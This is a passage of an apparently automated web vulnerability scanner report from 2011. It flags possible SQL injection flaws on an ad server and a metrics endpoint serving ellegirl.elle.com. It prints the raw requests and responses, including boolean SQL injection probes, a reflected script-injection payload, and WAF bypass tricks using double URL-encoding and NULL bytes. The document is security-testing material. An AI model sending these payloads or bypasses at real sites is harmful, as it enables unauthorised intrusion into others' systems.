Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=o4Y5Y9wQKLW1caa1gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.12. http://hfm.checkm8.com/adam/detected [RES parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The RES parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the RES parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d1--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:23 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wK67ULv9UJ7MTba;Path=/;
Set-cookie: C=o3L6Y9wUS38Scaa7dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d2--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:24 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=o3L6Y9wUS38Scaa8dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 30093398'%20or%201%3d1--%20 and 30093398'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wKWJSLv9UJ7MTba;Path=/;
Set-cookie: C=okZ5Y9wz8F6ScaaziSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=okZ5Y9wz8F6ScaaAiSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads 44066463'%20or%201%3d1--%20 and 44066463'%20or%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d1--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oSL6Y9wdWQQ0caa6cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d2--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oSL6Y9wdWQQ0caa7cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The cm8dccp cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cm8dccp cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=omM6Y9wdWQQ0caaCfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:01 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:43 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=omM6Y9wdWQQ0caaDfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:02 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.elle.com
Path:   /b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hcfellegirlprod/1/H.15.1/s92564277239143 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html


1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.elle.com
Path:   /b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/hcfellegirlprod/1%00'/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
